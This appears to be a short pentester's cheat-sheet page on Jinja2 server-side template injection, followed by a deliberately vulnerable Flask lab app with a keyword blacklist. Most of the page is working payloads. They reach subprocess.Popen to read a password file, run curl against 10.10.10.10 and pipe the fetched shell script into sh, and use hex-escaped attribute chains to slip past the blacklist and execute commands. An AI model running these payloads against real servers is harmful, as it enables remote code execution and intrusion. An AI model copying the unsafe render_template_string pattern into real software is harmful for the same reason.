SSTI

Todo

{{''.__class__.__mro__[1].__subclasses__()}}

We need to find `subprocess.Popen`

{{''.__class__.__mro__[1].__subclasses__()[250:]}}

{{''.__class__.__mro__[1].__subclasses__()[408]("cat+.passwd",shell=True,stdout=-1).communicate()[0].strip()}}

{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('curl+10.10.10.10/shell|sh')}}

{{ self._TemplateReference__context.joiner.__init__.__globals__.os }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os }}

Basic Lab

from flask import Flask, request, render_template_string

app = Flask(__name__)

blacklist = ['.', '}}', '*', '[', ']', "'", '{{', '_', '+', '/', '-', '<', '>', 'self', 'globals', 'builtins', 'import', 'init', 'class', 'mro', 'getitem', 'config', 'base', 'safe']

@app.route('/')
def index():
    param = request.args.get('cmd', '')
    error = None

    if any(blacklisted_word in param for blacklisted_word in blacklist):
        error = "L'utilisation de certains mots n'est pas autorisée."
        return render_template_string("Error")
    return render_template_string(param, error=error)

if __name__ == '__main__':
    app.run(debug=True)

{%with+a=request|attr("<@hex_escapes>application<@/hex_escapes>")|attr("<@hex_escapes>__globals__<@/hex_escapes>")|attr("<@hex_escapes>__getitem__<@/hex_escapes>")("<@hex_escapes>__builtins__<@/hex_escapes>")|attr("<@hex_escapes>__getitem__<@/hex_escapes>")("<@hex_escapes>__import__<@/hex_escapes>")("os")|attr("<@hex_escapes>popen<@/hex_escapes>")("<@hex_escapes>id<@/hex_escapes>")|attr("<@hex_escapes>read<@/hex_escapes>")()%}{%print(a)%}{%endwith%}

References

PreviousShells NextXSS

Last updated 11 months ago